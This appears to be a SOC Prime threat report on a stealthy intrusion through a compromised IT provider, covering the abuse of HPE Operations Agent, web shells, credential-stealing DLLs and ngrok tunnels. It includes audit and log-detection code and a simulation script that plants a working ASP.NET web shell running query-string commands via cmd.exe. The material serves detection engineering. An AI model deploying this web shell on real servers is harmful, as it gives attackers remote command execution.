SOC Prime Bias: Critical

18 May 2026 18:27 UTC

Investigating a Stealthy Intrusion Through Third-Party Compromise

SOC Prime Team

Summary

The report examines a stealthy intrusion in which threat actors compromised a third-party IT services provider and then abused the legitimate HPE Operations Agent to deploy web shells, credential-stealing DLLs, and tunneling utilities. By relying on trusted management software instead of loud exploitation, the attackers were able to maintain long-term access while minimizing obvious signs of compromise.

Investigation

Microsoft Incident Response traced the activity from initial web shell deployment on internet-facing servers to VBScript execution through HPE Operations Agent. The investigation then uncovered registration of malicious network provider and password-filter DLLs on domain controllers, followed by reuse of harvested credentials and use of ngrok tunnels to support lateral movement across the environment.

Mitigation

Recommended defenses include reducing and tightly controlling trusted third-party access, monitoring for unauthorized DLL registration in LSA notification packages, detecting suspicious web shell changes, enforcing strict egress filtering, and ensuring EDR coverage across all endpoints.
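As an added example (not part of the SOC Prime report or its detection content), the two registry-backed persistence points named above can be baselined with a small Python check; the allowlists, the sample registry values and the function names are assumptions modelled on a stock domain controller, with the DLL names and paths taken from this report's artifacts.

```python
r"""Baseline check for the two credential-capture persistence points the
mitigation list calls out: LSA notification packages and network provider
DLLs. On a live host the inputs come from
HKLM\SYSTEM\CurrentControlSet\Control\Lsa -> 'Notification Packages',
...\Control\NetworkProvider\Order -> 'ProviderOrder' and
...\Services\<name>\NetworkProvider -> 'ProviderPath'; here they are
constructed samples so the check runs offline."""

# Allowlists are an assumption for a stock domain controller; extend per estate.
KNOWN_NOTIFICATION_PACKAGES = {"scecli", "rassfm"}
KNOWN_PROVIDERS = {"RDPNP", "LanmanWorkstation", "webclient"}
# A legitimate provider DLL lives under the system directory.
TRUSTED_DLL_PREFIXES = ("c:\\windows\\system32\\", "%systemroot%\\system32\\")


def audit_lsa_packages(packages):
    """Return notification-package names that are not on the allowlist.
    The registry value holds bare module names (no path), so names are compared."""
    return [p for p in packages if p.lower() not in KNOWN_NOTIFICATION_PACKAGES]


def audit_network_providers(provider_order, provider_paths):
    """Return (name, dll_path, reason) for providers that are unknown or
    that load their DLL from outside the system directory."""
    findings = []
    for name in provider_order.split(","):
        path = provider_paths.get(name, "")
        if name not in KNOWN_PROVIDERS:
            findings.append((name, path, "not in provider allowlist"))
        elif not path.lower().startswith(TRUSTED_DLL_PREFIXES):
            findings.append((name, path, "DLL outside System32"))
    return findings


# Constructed sample values mirroring the artifacts in this report
# (passms as an extra notification package, mslogon as an extra provider).
SAMPLE_PACKAGES = ["scecli", "passms"]
SAMPLE_ORDER = "RDPNP,LanmanWorkstation,webclient,mslogon"
SAMPLE_PATHS = {
    "RDPNP": "%SystemRoot%\\System32\\drprov.dll",
    "LanmanWorkstation": "%SystemRoot%\\System32\\ntlanman.dll",
    "webclient": "%SystemRoot%\\System32\\davclnt.dll",
    "mslogon": "C:\\Users\\Public\\Music\\abc123c.d\\mslogon.dll",
}

if __name__ == "__main__":
    for pkg in audit_lsa_packages(SAMPLE_PACKAGES):
        print(f"[!] unknown LSA notification package: {pkg}")
    for name, path, why in audit_network_providers(SAMPLE_ORDER, SAMPLE_PATHS):
        print(f"[!] network provider {name} ({path}): {why}")
```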

Response

If this activity is detected, isolate the compromised systems, remove malicious DLLs and web shells, revoke any stolen credentials, disable unauthorized network providers, and hunt for lateral movement using the collected artifacts.

Attack Flow

    graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef file fill:#e6e6e6
    classDef malware fill:#ff9999

    %% Nodes – Initial Access
    action_initial_trusted["<b>Action</b> – <b>T1199 Trusted Relationship</b><br/>Compromise third-party IT services provider and use trusted HPE Operations Agent to run malicious code."]
    class action_initial_trusted action
    tool_hpe_oa["<b>Tool</b> – <b>Name</b>: HPE Operations Agent (OA)<br/><b>Purpose</b>: Legitimate agent used to execute scripts on target servers."]
    class tool_hpe_oa tool

    %% Nodes – Execution
    action_execution_vbscript["<b>Action</b> – Execution of VBScripts (T1059.005)<br/>Run <i>abc003.vbs</i> for system, network and AD discovery."]
    class action_execution_vbscript action
    file_abc003["<b>File</b> – <b>Name</b>: abc003.vbs<br/><b>Type</b>: Visual Basic Script"]
    class file_abc003 file

    %% Nodes – Persistence (Web Shell)
    action_persistence_webshell["<b>Action</b> – <b>T1505.003 Server Software Component: Web Shell</b><br/>Deploy <i>Errors.aspx</i> and <i>Signoff.aspx</i> web shells on internet-facing servers."]
    class action_persistence_webshell action
    file_errors["<b>File</b> – <b>Name</b>: Errors.aspx<br/><b>Function</b>: Remote command execution web shell."]
    class file_errors file
    file_signoff["<b>File</b> – <b>Name</b>: Signoff.aspx<br/><b>Function</b>: Remote command execution web shell."]
    class file_signoff file

    %% Nodes – Persistence (Network Provider DLL)
    action_persistence_np_dll["<b>Action</b> – <b>T1556.008 Network Provider DLL</b><br/>Register malicious <i>mslogon.dll</i> on domain controllers to capture clear-text credentials."]
    class action_persistence_np_dll action
    file_mslogon["<b>File</b> – <b>Name</b>: mslogon.dll<br/><b>Location</b>: C:\Users\Public\Music\abc123c.d"]
    class file_mslogon file

    %% Nodes – Persistence (Password Filter DLL)
    action_persistence_passdll["<b>Action</b> – <b>T1556.002 Password Filter DLL</b><br/>Add <i>passms.dll</i> as LSA notification package on DC01/DC02 to intercept password changes."]
    class action_persistence_passdll action
    file_passms["<b>File</b> – <b>Name</b>: passms.dll<br/><b>Location</b>: C:\ProgramData\WindowsUpdateService\UpdateDir\Ipd"]
    class file_passms file

    %% Nodes – Credential Access (Files)
    action_cred_in_files["<b>Action</b> – <b>T1552.001 Credentials In Files</b><br/>Store harvested credentials in clear-text or encoded files on disk."]
    class action_cred_in_files action

    %% Nodes – Credential Access (OS Dumping)
    action_os_credential_dump["<b>Action</b> – <b>T1003 OS Credential Dumping</b><br/>DLL-based interception provides credential dumping without external tools."]
    class action_os_credential_dump action

    %% Nodes – Lateral Movement (Valid Accounts)
    action_lateral_local["<b>Action</b> – <b>T1078.003 Valid Accounts: Local Accounts</b><br/>Reuse harvested credentials to authenticate via RDP and SMB."]
    class action_lateral_local action

    %% Nodes – Lateral Movement (Remote Services)
    action_lateral_remote["<b>Action</b> – <b>T1021 Remote Services</b><br/>Establish RDP sessions over encrypted ngrok tunnels to move laterally."]
    class action_lateral_remote action

    %% Nodes – Command & Control (Proxy)
    action_c2_proxy["<b>Action</b> – <b>T1090 Proxy</b><br/>Deploy ngrok as multi-hop proxy to create covert C2 channels."]
    class action_c2_proxy action
    tool_ngrok["<b>Tool</b> – <b>Name</b>: ngrok<br/><b>Purpose</b>: Create TCP/HTTPS tunnels for traffic tunneling."]
    class tool_ngrok tool

    %% Nodes – Command & Control (Protocol Tunneling)
    action_c2_tunnel["<b>Action</b> – <b>T1572 Protocol Tunneling</b><br/>Encapsulate C2 traffic inside ngrok tunnels to evade detection."]
    class action_c2_tunnel action

    %% Nodes – Collection (Network Shared Drive)
    action_collection_share["<b>Action</b> – <b>T1039 Data from Network Shared Drive</b><br/>Stage encoded credential files on remote SMB shares before exfiltration."]
    class action_collection_share action

    %% Nodes – Defense Evasion (DLL Hijack)
    action_defense_dll["<b>Action</b> – <b>T1574.001 Hijack Execution Flow: DLL</b><br/><i>msupdate.dll</i> exfiltrates data via SMTP and SMB, disguised as image files."]
    class action_defense_dll action
    file_msupdate["<b>File</b> – <b>Name</b>: msupdate.dll<br/><b>Payload</b>: Encoded data sent as icon02.jpeg."]
    class file_msupdate file

    %% Nodes – Persistence (Winlogon Helper DLL)
    action_persistence_winlogon["<b>Action</b> – <b>T1547.004 Winlogon Helper DLL</b><br/>Register <i>mslogon.dll</i> as Winlogon helper to ensure execution at logon."]
    class action_persistence_winlogon action

    %% Connections – Attack Flow
    action_initial_trusted -->|uses| tool_hpe_oa
    tool_hpe_oa -->|executes| action_execution_vbscript
    action_execution_vbscript -->|runs| file_abc003
    action_execution_vbscript -->|leads to| action_persistence_webshell
    action_persistence_webshell -->|creates| file_errors
    action_persistence_webshell -->|creates| file_signoff
    action_persistence_webshell -->|enables| action_persistence_np_dll
    action_persistence_np_dll -->|installs| file_mslogon
    action_persistence_np_dll -->|enables| action_persistence_passdll
    action_persistence_passdll -->|installs| file_passms
    action_persistence_passdll -->|stores| action_cred_in_files
    action_cred_in_files -->|provides data for| action_os_credential_dump
    action_os_credential_dump -->|enables| action_lateral_local
    action_lateral_local -->|uses| action_lateral_remote
    action_lateral_remote -->|utilizes| tool_ngrok
    tool_ngrok -->|facilitates| action_c2_proxy
    action_c2_proxy -->|enables| action_c2_tunnel
    action_c2_tunnel -->|supports| action_collection_share
    action_collection_share -->|provides files for| action_defense_dll
    action_defense_dll -->|uses| file_msupdate
    action_defense_dll -->|supports| action_persistence_winlogon
    action_persistence_winlogon -->|relies on| file_mslogon

    %% Styling
    class action_initial_trusted,action_execution_vbscript,action_persistence_webshell,action_persistence_np_dll,action_persistence_passdll,action_cred_in_files,action_os_credential_dump,action_lateral_local,action_lateral_remote,action_c2_proxy,action_c2_tunnel,action_collection_share,action_defense_dll,action_persistence_winlogon action
    class tool_hpe_oa,tool_ngrok tool
    class file_abc003,file_errors,file_signoff,file_mslogon,file_passms,file_msupdate file

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (T1199) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Initial Compromise: The attacker gains write access to the web root (e.g., via a stolen credential or vulnerable upload endpoint).
    2. Web‑Shell Deployment: They upload a malicious ASP.NET web‑shell named Errors.aspx (or modify an existing Signoff.aspx) that executes arbitrary PowerShell commands supplied via the query string.
    3. Triggering the Shell: The attacker sends an HTTP GET request to the shell with a PowerShell payload in the cmd parameter, e.g., https://corp.example.com/Errors.aspx?cmd=whoami. This request is logged by IIS, producing a cs-uri-stem value of /Errors.aspx – exactly what the Sigma rule matches.
  • Regression Test Script: The script reproduces steps 2‑3 (upload is simulated by copying a pre‑crafted file into the web root; triggering is performed via Invoke-WebRequest).

    # -------------------------------------------------
    # Web‑Shell Simulation Script – Windows Server/IIS
    # -------------------------------------------------
    param (
        [string]$WebRoot = "C:\inetpub\wwwroot",
        [string]$ShellName = "Errors.aspx",
        [string]$Payload = "whoami"
    )
    
    # 1. Deploy a simple ASP.NET web‑shell (minimal for testing)
    $shellContent = @"
    <%@ Page Language="C#" %>
    <% 
    string cmd = Request.QueryString["cmd"];
    if (!String.IsNullOrEmpty(cmd)) {
        System.Diagnostics.Process.Start("cmd.exe", "/c " + cmd);
    }
    %>
    "@
    
    $shellPath = Join-Path $WebRoot $ShellName
    Set-Content -Path $shellPath -Value $shellContent -Encoding UTF8 -Force
    
    Write-Host "[+] Deployed web‑shell to $shellPath"
    
    # 2. Give the web server a moment to register the new file
    Start-Sleep -Seconds 2
    
    # 3. Invoke the web‑shell to generate the detection‑triggering log entry
    #    ${ShellName} is braced because '?' is a valid variable-name character
    #    in PowerShell; unbraced, "$ShellName?" would expand to an empty string.
    $uri = "http://localhost/${ShellName}?cmd=$Payload"
    Invoke-WebRequest -Uri $uri -UseBasicParsing | Out-Null
    
    Write-Host "[+] Triggered web‑shell via $uri"
    # -------------------------------------------------
  • Cleanup Commands: Remove the test web‑shell and any residual files.

    # Cleanup script – remove the simulated web‑shell
    param (
        [string]$WebRoot = "C:\inetpub\wwwroot",
        [string]$ShellName = "Errors.aspx"
    )
    $shellPath = Join-Path $WebRoot $ShellName
    if (Test-Path $shellPath) {
        Remove-Item -Path $shellPath -Force
        Write-Host "[+] Removed $shellPath"
    } else {
        Write-Host "[-] Shell file not found; nothing to clean."
    }
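The detection side of the simulation above, as an added example that is not the Sigma rule or any script from this page: the IIS W3C log telemetry that step 3 describes (a cs-uri-stem of /Errors.aspx with a cmd= query) is parsed and matched in Python; the log lines are constructed samples and the function names are this example's own.

```python
"""Detection logic for the IIS telemetry the simulation above generates.

Parses IIS W3C-format log text, using the #Fields header to map columns,
and flags (a) requests to the web-shell names from this report
(Errors.aspx / Signoff.aspx) and (b) any other .aspx request carrying a
cmd= query parameter. The log lines are constructed samples, not logs
from the incident; the function names are this example's own."""
from urllib.parse import parse_qs

WEBSHELL_NAMES = {"errors.aspx", "signoff.aspx"}  # names from the report

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2026-05-18 10:01:02 10.0.0.5 GET /Default.aspx - 443 - 203.0.113.7 Mozilla/5.0 200
2026-05-18 10:01:09 10.0.0.5 GET /Errors.aspx cmd=whoami 443 - 203.0.113.7 Mozilla/5.0 200
2026-05-18 10:02:14 10.0.0.5 GET /app/signoff.aspx - 443 - 203.0.113.7 Mozilla/5.0 200
2026-05-18 10:03:30 10.0.0.5 POST /upload.aspx cmd=net+user 443 - 198.51.100.9 curl/8.0 200
2026-05-18 10:04:00 10.0.0.5 GET /help.aspx page=cmd 443 - 198.51.100.9 Mozilla/5.0 200
"""


def parse_iis_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # header may repeat on log rotation
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            values = line.split()
            if len(values) == len(fields):     # skip truncated or malformed lines
                yield dict(zip(fields, values))


def webshell_hits(text):
    """Return (reason, record) pairs for requests matching the rule's telemetry."""
    hits = []
    for rec in parse_iis_w3c(text):
        name = rec.get("cs-uri-stem", "").rsplit("/", 1)[-1].lower()
        query = rec.get("cs-uri-query", "-")
        params = parse_qs(query) if query != "-" else {}   # IIS logs '-' for no query
        if name in WEBSHELL_NAMES:
            hits.append(("known-webshell-name", rec))
        elif name.endswith(".aspx") and "cmd" in params:
            hits.append(("cmd-parameter", rec))
    return hits


if __name__ == "__main__":
    for reason, rec in webshell_hits(SAMPLE_LOG):
        print(f"[!] {reason}: {rec['c-ip']} {rec['cs-method']} "
              f"{rec['cs-uri-stem']}?{rec['cs-uri-query']}")
```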